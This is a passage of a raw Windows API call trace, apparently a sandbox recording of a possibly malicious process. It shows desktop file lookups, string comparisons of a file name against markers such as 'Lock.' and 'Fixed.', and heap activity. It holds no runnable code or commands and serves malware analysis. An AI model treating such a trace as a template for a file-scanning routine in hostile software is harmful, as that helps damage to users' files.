lpString1="7Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0188.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.818] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0188.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QzBYTrrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zBYTrrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYTrrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YTrrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TrrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rrsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rsKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KyNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yNkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nkrz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="krz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rz7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qz2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z2.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0188.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0188.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0188.819] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0188.819] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0188.820] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0188.820] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.820] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0188.820] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.821] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0188.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.821] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/QzBYTrrsKyNkrz7Qz2.swf", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6b6db0, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0xeb9330c0, ftLastAccessTime.dwHighDateTime=0x1d4cca1, ftLastWriteTime.dwLowDateTime=0xeb9330c0, ftLastWriteTime.dwHighDateTime=0x1d4cca1, nFileSizeHigh=0x0, nFileSizeLow=0x178b5, dwReserved0=0xb330006, dwReserved1=0xf6c3, cFileName="QzBYTrrsKyNkrz7Qz2.swf", cAlternateFileName="QZBYTR~1.SWF")) returned 0xaa58e0 [0188.822] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.822] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.824] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.824] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.824] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.825] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.825] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.825] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.826] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.826] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0188.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.826] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.827] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.827] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0188.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.828] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0188.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 